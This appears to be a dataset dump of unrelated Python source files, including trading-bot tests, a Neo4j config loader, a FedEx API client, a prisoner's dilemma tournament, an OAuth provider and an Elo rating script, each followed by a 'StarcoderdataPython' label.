self.assertEqual(t.watchlist[0], "A")
@delete_save_files(".")
def test_start_do_nothing(self):
_, _, _ = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
def test_invalid_aggregation(self):
"""If invalid aggregation is set, it should raise an error"""
s = DummyStreamer()
# Prevent streamer from running which will cause an infinite loop
s.start = lambda: None
t = PaperTrader(s)
with self.assertRaises(Exception):
t.start("30MIN", ["5MIN", "1DAY"])
def _create_fake_calendar_df(self, open_today, close_today):
df = pd.DataFrame(
{
"is_open": [True] * 24,
"open_at": [open_today - dt.timedelta(days=24 - i) for i in range(24)],
"close_at": [
close_today - dt.timedelta(days=24 - i) for i in range(24)
],
}
)
return df
def test_day_trade_detection_0(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
# Manually add transaction history of buying and selling shares on the same day
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 100, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 1)
def test_day_trade_detection_1(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
If an asset is bought, partially sold on the same day, and sold again the same day,
it should be counted as 1 day trade.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
# Manually add transaction history of buying and selling shares on the same day
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 30, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 1)
def test_day_trade_detection_2(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
If an asset is bought, partially sold on the same day, and bought again the same day,
it should be counted as 1 day trade.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 50, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 1)
def test_day_trade_detection_3(self):
"""
Test that day trade detection returns the correct number of day trades in the past day.
If an asset is bought, partially sold on the same day, bought again the same day,
and then sold again the same day, it should be counted as 2 day trades.
"""
open_today = dt.datetime.now().replace(
hour=9, minute=30, second=0, microsecond=0
)
close_today = dt.datetime.now().replace(
hour=16, minute=0, second=0, microsecond=0
)
df = self._create_fake_calendar_df(open_today, close_today)
trader, dummy, paper = create_trader_and_api("dummy", "paper", "1MIN", ["A"])
trader.storage.storage_calendar = df
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 100, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "buy", 50, 1.0)
trader.storage.store_transaction(open_today, "N/A", "A", "sell", 50, 1.0)
daytrades = trader.day_trade_count()
self.assertEqual(daytrades, 2)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3339300 | # add all the question types to QuestionChoices before anything else
from .. import add_type
from . import simple # store value as returned
from . import choice # multiple choice, do checks
from . import range_or_number # range of numbers
from . import timeperiod # time periods
from . import custom # backwards compatibility support
add_type('custom', 'Custom field') | StarcoderdataPython |
86649 | from environs import Env
import re
import socket
# Loads environmental variables from .env
env = Env()
env.read_env()
# remove ./ from beginning of neo4j variables to avoid issues with docker
neo4j_import_dir = re.sub(
"^./", "", env("NEO4J_IMPORT_DIR", "./demo/neo4j/0.0.1/import")
)
neo4j_log_dir = re.sub("^./", "", env("NEO4J_LOG_DIR", "./demo/neo4j/0.0.1/logs"))
neo4j_data_dir = re.sub("^./", "", env("NEO4J_DATA_DIR", "./demo/neo4j/0.0.1/data"))
snakemake_logs = env("SNAKEMAKE_LOGS", "demo/results/logs")
data_dir = env("DATA_DIR", "demo/source_data")
processing_dir = env("PROCESSING_DIR", "demo/scripts/processing")
graph_dir = env("GRAPH_DIR", "demo/results/graph_data")
neo4j_address = env("NEO4J_ADDRESS", socket.getfqdn())
server_name = env("SERVER_NAME", None)
graph_version = env("GRAPH_VERSION", "0.0.1")
container_name = env("GRAPH_CONTAINER_NAME", "neo4j-pipeline-demo-graph")
config_path = env("CONFIG_PATH", "demo/config")
threads = env("THREADS", 4)
graph_bolt = env("GRAPH_BOLT_PORT", "7687")
graph_http = env("GRAPH_HTTP_PORT", "7474")
graph_pass = env("GRAPH_PASSWORD", "<PASSWORD>")
graph_user = env("GRAPH_USER", "neo4j")
graph_host = env("GRAPH_HOST", "localhost")
env_configs = {
"neo4j_import_dir": neo4j_import_dir,
"neo4j_log_dir": neo4j_log_dir,
"neo4j_data_dir": neo4j_data_dir,
"neo4j_address": neo4j_address,
"snakemake_logs": snakemake_logs,
"data_dir": data_dir,
"processing_dir": processing_dir,
"graph_dir": graph_dir,
"server_name": server_name,
"graph_version": graph_version,
"graph_bolt": graph_bolt,
"graph_http": graph_http,
"graph_pass": graph_pass,
"graph_user": graph_user,
"graph_host": graph_host,
"container_name": container_name,
"config_path": config_path,
"threads": threads,
}
| StarcoderdataPython |
1739887 | """Dump Bathak Data"""
import json
from urduhack.utils.io import pickle_dump
new_training_data = []
data = "/Users/ikramali/Projects/Python/Xplore/data/125-172908_bathak_51986_posts-raw.pkl"
data_dump = f"86686_arynews_posts-raw.pkl"
json_data = "/Users/ikram/WorkPlace/projects/posts.json"
# with open(data, 'rb') as f:
# training_data = pickle.load(f)
#
# print("Old training data Count:{}".format(len(training_data)))
#
# for data_tuple in training_data:
# new_training_data.append(data_tuple)
#
# print("New training data Count:{}".format(len(new_training_data)))
#
# new_training_data = sorted(new_training_data, key=lambda x: int(x[0]))
#
# print(new_training_data[-3])
# print(new_training_data[-2])
# print(new_training_data[-1])
json_data = json.load(open(json_data))
json_data_list = []
for item in json_data:
data = (item['url'], item['data'])
json_data_list.append(data)
print("Json training data Count:{}".format(len(json_data_list)))
print(json_data_list[0])
print(json_data_list[1])
print(json_data_list[2])
# last post
print(json_data_list[-3])
print(json_data_list[-2])
print(json_data_list[-1])
for data_tuple in json_data_list:
new_training_data.append(data_tuple)
print("New training data Count:{}".format(len(new_training_data)))
print(new_training_data[0])
print(new_training_data[-2])
print(new_training_data[-1])
pickle_dump(data_dump, new_training_data)
| StarcoderdataPython |
3378151 | <filename>projectname/exampleapp/models/__init__.py
from .example import ExampleModel
| StarcoderdataPython |
3284402 | #x0 y0 x1 y1
paths = \
[dict(steering_angle = 0, target_angle = 0, coords = \
[[-123, 100, 123, 100],
[-123, 335, 123, 335],
[-123, 570, 123, 570],
[-123, 805, 123, 805],
[-123, 1040, 123, 1040],
[-123, 1275, 123, 1275],
[-123, 1510, 123, 1510],
[-123, 1745, 123, 1745],
[-123, 1980, 123, 1980]]),
dict(steering_angle = 11, target_angle = 11, coords = \
[[138.322, 100, -123, 100],
[159.503, 321.132, -99.3681, 351.273],
[190.588, 546.85, -66.7938, 587.805],
[231.097, 771.067, -24.3433, 822.765],
[280.961, 993.392, 27.9092, 1055.74],
[340.091, 1213.43, 89.8718, 1286.32],
[408.383, 1430.81, 161.436, 1514.11],
[485.718, 1645.13, 242.476, 1738.7],
[571.96, 1856.02, 332.85, 1959.7]
]),
dict(steering_angle = 15, target_angle = 18, coords = \
[[156.086, 100, -123, 100],
[190.178, 271.401,-78.3038, 334.508],
[248.678, 479.838, -13.4327, 565.647],
[324.768, 682.516, 70.9446, 790.4],
[417.892, 877.955, 174.211, 1007.13],
[527.369, 1064.72, 295.612, 1214.24],
[652.4, 1241.46, 434.261, 1410.22],
[792.069, 1406.87, 589.143, 1593.65],
[945.357, 1559.75, 759.127, 1763.17]
]),
dict(steering_angle = 20, target_angle = 25, coords = \
[[183.207, 100, -123, 100],
[234.5, 242.056, -37.6253, 357.107],
[313.699, 400.78, 58.1394, 549.03],
[412.168, 548.326, 177.203, 727.438],
[528.352, 682.368, 317.689, 889.516],
[660.42, 800.791, 477.38, 1032.71],
[806.288, 901.727, 653.76, 1154.76],
[963.658, 983.586, 844.045, 1253.74],
[1130.05, 1045.08, 1045.23, 1328.09]
]),
dict(steering_angle = 30, target_angle = 30, coords = \
[[226.055, 100, -123, 100],
[226.055, 100, -54.6, 251.44],
[325.447, 245.977, 81.6842, 451.6],
[431.621, 351.6, 227.268, 596.429],
[554.524, 437.182, 395.789, 713.777],
[690.42, 500.122, 582.127, 800.079],
[835.181, 538.508, 780.621, 852.712],
[984.409, 551.173, 985.238, 870.078],
[1133.57, 537.732, 1189.76, 851.648]
]),
dict(steering_angle = 50, target_angle = 40, coords = \
[[309.664, 100, -123, 100],
[309.664, 100, -14.8391, 261.76],
[355.424, 135.437, 130.504, 399.329],
[425.673, 176.568, 274.031, 487.203],
[516.827, 211.252, 423.619, 544.12],
[612.737, 228.949, 581.013, 573.162],
[710.267, 229.08, 741.064, 573.377],
[806.224, 211.642, 898.536, 544.76],
[897.471, 177.203, 1048.28, 488.245]])]
| StarcoderdataPython |
44580 | import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from PySide2.QtWidgets import QVBoxLayout, QWidget
from traitlets import HasTraits, Instance, Bool, directional_link
from regexport.model import AppState
from regexport.views.utils import HasWidget
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT
from matplotlib.figure import Figure
class PlotModel(HasTraits):
selected_data = Instance(np.ndarray, allow_none=True)
data = Instance(np.ndarray, allow_none=True)
show = Bool(default_value=True)
def register(self, model: AppState):
self.model = model
model.observe(self.update, ['cells', 'selected_cells', 'column_to_plot', 'show_plots'])
directional_link((model, 'show_plots'), (self, 'show'))
def update(self, change):
model = self.model
if model.selected_cells is None or model.selected_cells[model.column_to_plot].dtype.name == 'category':
self.selected_data = None
else:
self.data = model.cells[model.column_to_plot].values
self.selected_data = model.selected_cells[model.column_to_plot].values
class PlotView(HasWidget):
# Code from https://www.pythonguis.com/tutorials/plotting-matplotlib/
def __init__(self, model: PlotModel, width=5, height=4, dpi=100):
# Make a figure, turn it into a canvas widget
widget = QWidget()
layout = QVBoxLayout()
widget.setLayout(layout)
HasWidget.__init__(self, widget=widget)
self.fig, self.axes = plt.subplots(ncols=2, figsize=(width, height), dpi=dpi)
self.canvas = FigureCanvasQTAgg(figure=self.fig)
layout.addWidget(self.canvas)
self.toolbar = NavigationToolbar2QT(self.canvas, widget)
layout.addWidget(self.toolbar)
self.model = model
self.model.observe(self.render)
def render(self, change):
if self.model.show:
for ax in self.axes:
ax.cla()
if change.new is None:
return
else:
selected_data = self.model.selected_data
if selected_data is not None:
data = selected_data
_, edges = np.histogram(data[data > 0], bins='auto')
all_edges = np.concatenate([[0, 1], edges])
self.axes[0].hist(
data,
bins=all_edges,
cumulative=False,
# density=True,
)
data = self.model.data
ax: plt.Axes = self.axes[1]
ax.hist(
data,
bins=50,
cumulative=True,
density=True,
)
if selected_data is not None:
ax.vlines(selected_data.max(), 0, 1, colors='black', linestyles='dotted')
# self.axes[1].set_ylim(0, 1)
self.canvas.draw()
| StarcoderdataPython |
3254834 | <filename>third_party/webrtc/src/chromium/src/third_party/webdriver/pylib/test/selenium/common/utils.py<gh_stars>1000+
import os
import socket
import time
import urllib
import subprocess
import signal
SERVER_ADDR = "localhost"
DEFAULT_PORT = 4444
SERVER_PATH = "build/java/server/src/org/openqa/grid/selenium/selenium-standalone.jar"
def start_server(module):
_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
url = "http://%s:%d/wd/hub" % (SERVER_ADDR, DEFAULT_PORT)
try:
_socket.connect((SERVER_ADDR, DEFAULT_PORT))
print ("The remote driver server is already running or something else"
"is using port %d, continuing..." % DEFAULT_PORT)
except:
print ("Starting the remote driver server")
module.server_proc = subprocess.Popen(
"java -jar %s" % SERVER_PATH,
shell=True)
assert wait_for_server(url, 10), "can't connect"
print "Server should be online"
def wait_for_server(url, timeout):
start = time.time()
while time.time() - start < timeout:
try:
urllib.urlopen(url)
return 1
except IOError:
time.sleep(0.2)
return 0
def stop_server(module):
# FIXME: This does not seem to work, the server process lingers
try:
os.kill(module.server_proc.pid, signal.SIGTERM)
time.sleep(5)
except:
pass
| StarcoderdataPython |
3294310 | <reponame>Linekio/python-fedex
"""
Location Service Module
This package contains the shipping methods defined by Fedex's
LocationService WSDL file. Each is encapsulated in a class for
easy access. For more details on each, refer to the respective class's
documentation.
"""
from ..base_service import FedexBaseService
class FedexSearchLocationRequest(FedexBaseService):
"""
This class allows you to figure out a FedEx location closest
to a specified location criteria, based on location type.
The response includes location details like operating times,
directions and a map link and more.
"""
def __init__(self, config_obj, *args, **kwargs):
"""
@type config_obj: L{FedexConfig}
@param config_obj: A valid FedexConfig object.
"""
self._config_obj = config_obj
# Holds version info for the VersionId SOAP object.
self._version_info = {
'service_id': 'locs',
'major': '9',
'intermediate': '0',
'minor': '0'
}
# Set default objects.
self.Address = None
"""@ivar: Holds the Address WSDL object."""
self.PhoneNumber = None
"""@ivar: Holds the PhoneNumber string object."""
self.MultipleMatchesAction = None
"""@ivar: Holds the MultipleMatchesActionType WSDL object."""
self.Constraints = []
"""@ivar: Holds a list of SearchLocationConstraints WSDL objects."""
self.LocationsSearchCriterion = None
"""@ivar: Holds the LocationsSearchCriteriaType WSDL object."""
self.SortDetail = None
"""@ivar: Holds the LocationSortDetail WSDL object."""
self.GeographicCoordinates = None
"""@ivar: Holds the GeographicCoordinates WSDL object."""
super(FedexSearchLocationRequest, self).__init__(
self._config_obj, 'LocationsService_v9.wsdl', *args, **kwargs)
def _prepare_wsdl_objects(self):
"""
Create the data structure and get it ready for the WSDL request.
"""
# Service defaults for objects that are required.
self.MultipleMatchesAction = 'RETURN_ALL'
self.Constraints = self.create_wsdl_object_of_type('SearchLocationConstraints')
self.Address = self.create_wsdl_object_of_type('Address')
self.LocationsSearchCriterion = 'ADDRESS'
self.GeographicCoordinates = None
self.SortDetail = self.create_wsdl_object_of_type('LocationSortDetail')
def _assemble_and_send_request(self):
"""
Fires off the Fedex request.
@warning: NEVER CALL THIS METHOD DIRECTLY. CALL send_request(),
WHICH RESIDES ON FedexBaseService AND IS INHERITED.
"""
# We get an exception like this when specifying an IntegratorId:
# suds.TypeNotFound: Type not found: 'IntegratorId'
# Setting it to None does not seem to appease it.
del self.ClientDetail.IntegratorId
self.logger.debug(self.WebAuthenticationDetail)
self.logger.debug(self.ClientDetail)
self.logger.debug(self.TransactionDetail)
self.logger.debug(self.VersionId)
# Fire off the query.
return self.client.service.searchLocations(
WebAuthenticationDetail=self.WebAuthenticationDetail,
ClientDetail=self.ClientDetail,
TransactionDetail=self.TransactionDetail,
Version=self.VersionId,
LocationsSearchCriterion=self.LocationsSearchCriterion,
PhoneNumber=self.PhoneNumber,
MultipleMatchesAction=self.MultipleMatchesAction,
Constraints=self.Constraints,
Address=self.Address,
SortDetail=self.SortDetail,
GeographicCoordinates=self.GeographicCoordinates)
| StarcoderdataPython |
3351050 | from eval.eval import MedlineEvaluator
from util.arguments import settings
if __name__ == '__main__':
medline_path_new = settings['medline_path']
medline_path_old = settings['medline_path_old']
unannotated_path = '/home/midas/data/eval/old-unannotated-major.json'
eval_candidate_path = '/home/midas/data/eval/new-annotated-major.json'
only_major = True
print 'old: ' + medline_path_old
print 'new: ' + medline_path_new
evaluator = MedlineEvaluator(medline_path_old, medline_path_new, unannotated_path, eval_candidate_path)
evaluator.extractCandidates(only_major)
print 'done!'
| StarcoderdataPython |
78003 | # pylint: disable=R0902,E1101,W0201,too-few-public-methods,W0613
import datetime
from sqlalchemy_utils import UUIDType
from sqlalchemy import (
Column,
DateTime,
Integer,
Sequence,
)
from codebase.utils.sqlalchemy import ORMBase
class User(ORMBase):
"""
用户由 AuthN 服务创建并鉴别,本处存储仅是为了关系映射方便
1. uuid 作为用户 ID 不宜放在其他关联表中,而应该使用 Integer 主键
2. SQLAlchemy 可以提供方便的查询
"""
__tablename__ = "authz_user"
id = Column(Integer, Sequence("authz_user_id_seq"), primary_key=True)
# TODO: 虽然我们这里认为 user id 是 uuid,当实际情况不一定是
# 这里可以考虑根据用户配置,动态创建 uid 项,而不是强制使用 uuid
uuid = Column(UUIDType(), unique=True)
created = Column(DateTime(), default=datetime.datetime.utcnow)
| StarcoderdataPython |
3470 | import os
import itertools
import importlib
import numpy as np
import random
STRATEGY_FOLDER = "exampleStrats"
RESULTS_FILE = "results.txt"
pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you do play i, and your opponent does play j.
moveLabels = ["D","C"]
# D = defect, betray, sabotage, free-ride, etc.
# C = cooperate, stay silent, comply, upload files, etc.
# Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent)
# The second axis is which turn. (0 = first turn, 1 = next turn, etc.
# For example, it might return
#
# [[0 0 1] a.k.a. D D C
# [1 1 1]] a.k.a. C C C
#
# if there have been 3 turns, and we have defected twice then cooperated once,
# and our opponent has cooperated all three times.
def getVisibleHistory(history, player, turn):
historySoFar = history[:,:turn].copy()
if player == 1:
historySoFar = np.flip(historySoFar,0)
return historySoFar
def runRound(pair):
moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0])
moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1])
memoryA = None
memoryB = None
LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 50 turns long. The np.log here guarantees that every turn after the 50th has an equal (low) chance of being the final turn.
history = np.zeros((2,LENGTH_OF_GAME),dtype=int)
for turn in range(LENGTH_OF_GAME):
playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA)
playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB)
history[0,turn] = playerAmove
history[1,turn] = playerBmove
return history
def tallyRoundScores(history):
scoreA = 0
scoreB = 0
ROUND_LENGTH = history.shape[1]
for turn in range(ROUND_LENGTH):
playerAmove = history[0,turn]
playerBmove = history[1,turn]
scoreA += pointsArray[playerAmove][playerBmove]
scoreB += pointsArray[playerBmove][playerAmove]
return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH
def outputRoundResults(f, pair, roundHistory, scoresA, scoresB):
f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n")
for p in range(2):
for t in range(roundHistory.shape[1]):
move = roundHistory[p,t]
f.write(moveLabels[move]+" ")
f.write("\n")
f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n")
f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n")
f.write("\n")
def pad(stri, leng):
result = stri
for i in range(len(stri),leng):
result = result+" "
return result
def runFullPairingTournament(inFolder, outFile):
print("Starting tournament, reading files from "+inFolder)
scoreKeeper = {}
STRATEGY_LIST = []
for file in os.listdir(inFolder):
if file.endswith(".py"):
STRATEGY_LIST.append(file[:-3])
for strategy in STRATEGY_LIST:
scoreKeeper[strategy] = 0
f = open(outFile,"w+")
for pair in itertools.combinations(STRATEGY_LIST, r=2):
roundHistory = runRound(pair)
scoresA, scoresB = tallyRoundScores(roundHistory)
outputRoundResults(f, pair, roundHistory, scoresA, scoresB)
scoreKeeper[pair[0]] += scoresA
scoreKeeper[pair[1]] += scoresB
scoresNumpy = np.zeros(len(scoreKeeper))
for i in range(len(STRATEGY_LIST)):
scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]]
rankings = np.argsort(scoresNumpy)
f.write("\n\nTOTAL SCORES\n")
for rank in range(len(STRATEGY_LIST)):
i = rankings[-1-rank]
score = scoresNumpy[i]
scorePer = score/(len(STRATEGY_LIST)-1)
f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n")
f.flush()
f.close()
print("Done with everything! Results file written to "+RESULTS_FILE)
runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
| StarcoderdataPython |
1662890 | <filename>genericDetector/__init__.py
from .genericDetector import GenericDetector | StarcoderdataPython |
1676759 | from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2_provider.provider import OAuth2Provider
class OdnoklassnikiAccount(ProviderAccount):
def get_profile_url(self):
return "https://ok.ru/profile/" + self.account.extra_data["uid"]
def get_avatar_url(self):
ret = None
pic_big_url = self.account.extra_data.get("pic1024x768")
pic_medium_url = self.account.extra_data.get("pic640x480")
pic_small_url = self.account.extra_data.get("pic190x190")
if pic_big_url:
return pic_big_url
elif pic_medium_url:
return pic_medium_url
elif pic_small_url:
return pic_small_url
else:
return ret
def to_str(self):
dflt = super(OdnoklassnikiAccount, self).to_str()
return self.account.extra_data.get("name", dflt)
class OdnoklassnikiProvider(OAuth2Provider):
id = "odnoklassniki"
name = "Odnoklassniki"
account_class = OdnoklassnikiAccount
def extract_uid(self, data):
return data["uid"]
def extract_common_fields(self, data):
return dict(last_name=data.get("last_name"), first_name=data.get("first_name"))
provider_classes = [OdnoklassnikiProvider]
| StarcoderdataPython |
46986 | #!/usr/bin/env python
"""Create benchmark for k nearest neighbor on unit sphere in R^k."""
# Scroll down to line 90 to "Adjust this" to add your experiment
import random
import numpy as np
import os.path
import logging
import sys
import Queue as queue
import h5py
import time
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',
level=logging.DEBUG,
stream=sys.stdout)
def create_point(n):
"""Create a random point on the unit sphere in R^n."""
p = np.array([random.uniform(-1, 1) for _ in range(n)])
return p / np.linalg.norm(p)
def create_points(n, number):
"""Create number random points on the unit sphere in R^n."""
return [create_point(n) for _ in range(number)]
def get_dist(a, b):
"""Get the Euclidean distance of two points a and b."""
return np.linalg.norm(a - b)
def run_q_at_a_time(candidates, queries, k, n, algorithm):
"""
Run every single query in queries.
Parameters
----------
candidates : object
Datastructure which contains the nearest neighbor candidates.
queries : list
List of points
k : int
How many points should be found
n : int
Dimension of each point / query
"""
assert k >= 1
assert n >= 1
solution = np.zeros((len(queries), k, n))
for i, query in enumerate(queries):
solution[i] = algorithm(D, query, k, n)
return solution
def brute_force_search(candidates, query, k, n):
"""Find the k nearest neighbors by brute force search."""
solution = np.zeros((k, n))
knn = queue.PriorityQueue()
for candidate in candidates:
dist = get_dist(candidate, query)
# insert time to prevent errors as 'candidate' is not sortable.
knn.put((dist, time.time(), candidate))
for j in range(k):
dist, _, item = knn.get()
solution[j] = item
return solution
def build_datastructure(candidates):
"""Make something sophisticated to speed up k-nn queries."""
return candidates
# parameters
k = 5 # get k closest points
n = 128 # dimensionality of each point / query
m = 10**5 # candidates for closest points
T = 10**2 # number of queries
query_batch_size = 10**1 # should divide T
assert T % query_batch_size == 0
# paths
query_file = "queries.hdf5"
candidates_file = "candidates.hdf5"
###############################################################################
# Adjust this
# gets the candidates as argument and should return a datastructure D
create_datastructure_algorithm = build_datastructure
# Gets D, query, k, n as arguments
search_algorithm = brute_force_search
###############################################################################
# Create query and candidate files if not exist or load them otherwise
if not os.path.isfile(candidates_file):
logging.info("Start creating %i candidates." % m)
candidates = create_points(n, m)
with h5py.File(candidates_file, 'w') as f:
dset = f.create_dataset('candidates',
data=np.array(candidates),
# maxshape=(None, n),
dtype='float32')
else:
with h5py.File(candidates_file, 'r') as f:
candidates = np.array(f.get('candidates'))
if not os.path.isfile(query_file):
logging.info("Start creating %i queries." % T)
with h5py.File(query_file, 'w') as f:
dset = f.create_dataset('queries',
shape=(query_batch_size, n),
maxshape=(None, n),
dtype='float32',
chunks=(query_batch_size, n))
for i in range(T / query_batch_size):
logging.info("\tQuery batch%i of %i." %
(i + 1, T / query_batch_size))
queries = np.array(create_points(n, query_batch_size))
if i > 0:
dset.resize((dset.shape[0] + query_batch_size, n))
dset[-query_batch_size:dset.shape[0], :] = queries
# Evaluate
logging.info("Start evaluation.")
total_time = 0
D = create_datastructure_algorithm(candidates)
with h5py.File(query_file, 'r') as f:
queries = f.get('queries')
for i in range(T / query_batch_size):
logging.info("\tQuery batch %i of %i." % (i + 1, T / query_batch_size))
q = queries[i * query_batch_size:(i + 1) * query_batch_size]
t0 = time.time()
solution = run_q_at_a_time(D, q, k, n, search_algorithm) # TODO
# Store the solution and compare against brute force to check if
# it is correct
t1 = time.time()
total_time += t1 - t0
logging.info("Needed %i seconds in total." % (total_time))
logging.info("k={k}, n={n}, m={m}, T={T}: {time:.2f}s per query."
.format(k=k,
n=n,
m=m,
T=T,
time=float(total_time) / T))
| StarcoderdataPython |
3271270 | <filename>scripts/calculate_rating.py
'''
Implementation of following rating algorithm
https://codeforces.com/blog/entry/20762
'''
import itertools
import json
import pymysql
from pymysql.cursors import DictCursor
USER_QUERY = 'SELECT user_id, username from users'
# TODO technically if a user has the same start time, they'll show up twice, this could be an issue
RUNS_QUERY = ('''
SELECT r.run_id, r.prompt_id, r.user_id, u.username,
TIMESTAMPDIFF(MICROSECOND, r.start_time, r.end_time) AS run_time
FROM sprint_runs AS r
INNER JOIN sprint_prompts AS p ON p.prompt_id=r.prompt_id
RIGHT JOIN users AS u ON r.user_id=u.user_id
INNER JOIN (
SELECT user_id, MIN(run_id) as run_id
FROM sprint_runs AS runs
GROUP BY runs.prompt_id, runs.user_id
) t ON r.user_id = t.user_id AND r.run_id = t.run_id
WHERE p.rated = 1 AND r.end_time IS NOT NULL AND p.used AND p.active_end <= NOW()
ORDER BY p.active_start, run_time;
''')
STORE_RATINGS_QUERY = (
'''
REPLACE INTO ratings (user_id, rating, num_rounds) VALUES (%s, %s, %s);
'''
)
STORE_HISTORICAL_RATINGS_QUERY = (
'''
REPLACE INTO historical_ratings (user_id, prompt_id, prompt_date, `prompt_rank`, rating) VALUES
(
%(user_id)s,
%(prompt_id)s,
(SELECT active_start FROM sprint_prompts where prompt_id=%(prompt_id)s),
%(rank)s,
%(rating)s
);
'''
)
INITIAL_RATING = 1500
def _elo_prob(ri, rj):
return 1 / (1 + 10 ** ((rj - ri) / 400 ))
def _calculate_seed(users, round):
for u in round:
users[u]["seed"] = 1
for v in round:
if u == v: continue
users[u]["seed"] += _elo_prob(users[v]["rating"], users[u]["rating"])
def _calculate_place(users, round):
for place, u in enumerate(round):
users[u]["place"] = (place + 1)
def _calculate_desired_seed(users):
for u in users:
user = users[u]
if "seed" not in user or "place" not in user: continue
user["desired_seed"] = (user["seed"] * user["place"]) ** 0.5
def _rating_for_seed(users, round, u, desired_seed):
lo = 1
hi = 8000
while lo < hi:
mid = (lo + hi) // 2
mid_seed = 1
# TODO should we exclude ourselves?
for v in round:
if u == v: continue
mid_seed += _elo_prob(users[v]["rating"], mid)
if mid_seed > desired_seed:
lo = mid + 1
else:
hi = mid
return lo
def _calculate_new_ratings(users, round):
for u in round:
users[u]["target"] = _rating_for_seed(users, round, u, users[u]["desired_seed"])
# if we change it in the loop above, it will affect things
for u in round:
users[u]["rating"] = (users[u]["target"] + users[u]["rating"]) // 2
def _update(users, round):
if len(round) == 1: return
for u in round: users[u]["num_rounds"] += 1
_calculate_seed(users, round)
_calculate_place(users, round)
_calculate_desired_seed(users)
_calculate_new_ratings(users, round)
def calculate_ratings():
config = json.load(open("../config/default.json"))
try:
config.update(json.load(open("../config/prod.json")))
except FileNotFoundError:
pass
conn = pymysql.connect(
user=config["MYSQL_USER"],
host=config["MYSQL_HOST"],
password=config["<PASSWORD>"],
database=config['DATABASE']
)
with conn.cursor(cursor=DictCursor) as cursor:
cursor.execute(USER_QUERY)
users = {
u['user_id']: {
"rating": INITIAL_RATING,
"num_rounds": 0,
"username": u["username"]
} for u in cursor.fetchall()
}
cursor.execute(RUNS_QUERY)
runs = cursor.fetchall()
# Assert to catch case where RUNS_QUERY has duplicates
assert(len(runs) == len(set((r["prompt_id"], r["user_id"]) for r in runs)))
for prompt_id, round in itertools.groupby(runs, lambda r: r['prompt_id']):
print(f"Processing Prompt {prompt_id}")
# Since we order by run time in our query, this is in order of ranking
round = [run["user_id"] for run in round]
_update(users, round)
# Store historical data
with conn.cursor(cursor=DictCursor) as cursor:
cursor.executemany(STORE_HISTORICAL_RATINGS_QUERY,
[
{
"user_id": user_id,
"prompt_id": prompt_id,
"rank": i + 1,
"rating": users[user_id]["rating"],
}
for i, user_id in enumerate(round)
]
)
conn.commit()
# Store current ratings
with conn.cursor(cursor=DictCursor) as cursor:
cursor.executemany(STORE_RATINGS_QUERY,
[
(k, v["rating"], v["num_rounds"])
for k, v in users.items()
]
)
conn.commit()
ratings = sorted([(v["rating"], v["num_rounds"], v["username"]) for k, v in users.items()])
for (rating, num_rounds, username) in ratings:
print(f"{username}: {rating} ({num_rounds})")
if __name__ == "__main__":
calculate_ratings() | StarcoderdataPython |
1679543 | from credo.banks_and_currencies import BanksCurrencies
from . import PUBLIC_KEY, SECRET_KEY
class TestBankCurrencies:
instance = BanksCurrencies(public_key=PUBLIC_KEY, secret_key=SECRET_KEY)
# testing for the data types because these endpoints don't return a status in the json response on success
def test_currencies(self):
status, currencies = self.instance.get_currencies()
assert status == 200
def test_banks(self):
status, banks = self.instance.get_banks()
assert status == 200
| StarcoderdataPython |
